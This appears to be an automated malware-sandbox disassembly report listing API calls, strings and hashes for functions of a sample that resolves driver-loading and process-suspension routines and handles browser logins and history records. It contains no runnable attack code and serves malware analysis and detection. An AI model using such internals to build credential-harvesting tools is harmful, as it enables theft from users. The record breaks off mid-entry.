                                                      • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                      • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+Fw@FFw@BFw
                                                      • API String ID: 667068680-2648589930
                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                      APIs
                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                      • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                      • API String ID: 4054529287-3175352466
                                                      • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                      • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                      • API String ID: 3143752011-1996832678
                                                      • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                      • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                      • API String ID: 1607361635-601624466
                                                      • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                      • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _snwprintf$memset$wcscpy
                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                      • API String ID: 2000436516-3842416460
                                                      • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                      • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                      APIs
                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                      • String ID:
                                                      • API String ID: 1043902810-0
                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                      APIs
                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                      • free.MSVCRT ref: 0040E49A
                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                      • memset.MSVCRT ref: 0040E380
                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E407
                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E422
                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75572EE0), ref: 0040E43D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                      • API String ID: 3849927982-2252543386
                                                      • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                      • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                      • wcscpy.MSVCRT ref: 004448B4
                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                      • API String ID: 2899246560-1542517562
                                                      • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                      • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                      APIs
                                                      • memset.MSVCRT ref: 0040DBCD
                                                      • memset.MSVCRT ref: 0040DBE9
                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                      • API String ID: 3330709923-517860148
                                                      • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                      • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                      APIs
                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                      • memset.MSVCRT ref: 0040806A
                                                      • memset.MSVCRT ref: 0040807F
                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                      • memset.MSVCRT ref: 004081E4
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                      • String ID: logins$null
                                                      • API String ID: 2148543256-2163367763
                                                      • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                      • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                      APIs
                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                      • memset.MSVCRT ref: 004085CF
                                                      • memset.MSVCRT ref: 004085F1
                                                      • memset.MSVCRT ref: 00408606
                                                      • strcmp.MSVCRT ref: 00408645
                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                      • memset.MSVCRT ref: 0040870E
                                                      • strcmp.MSVCRT ref: 0040876B
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                      • String ID: ---
                                                      • API String ID: 3437578500-2854292027
                                                      • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                      • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                      APIs
                                                      • memset.MSVCRT ref: 0041087D
                                                      • memset.MSVCRT ref: 00410892
                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                      • String ID:
                                                      • API String ID: 1010922700-0
                                                      • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                      • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                      APIs
                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                      • malloc.MSVCRT ref: 004186B7
                                                      • free.MSVCRT ref: 004186C7
                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                      • free.MSVCRT ref: 004186E0
                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                      • malloc.MSVCRT ref: 004186FE
                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                      • free.MSVCRT ref: 00418716
                                                      • free.MSVCRT ref: 0041872A
                                                      • free.MSVCRT ref: 00418749
                                                      Strings
                                                      Memory Dump Source
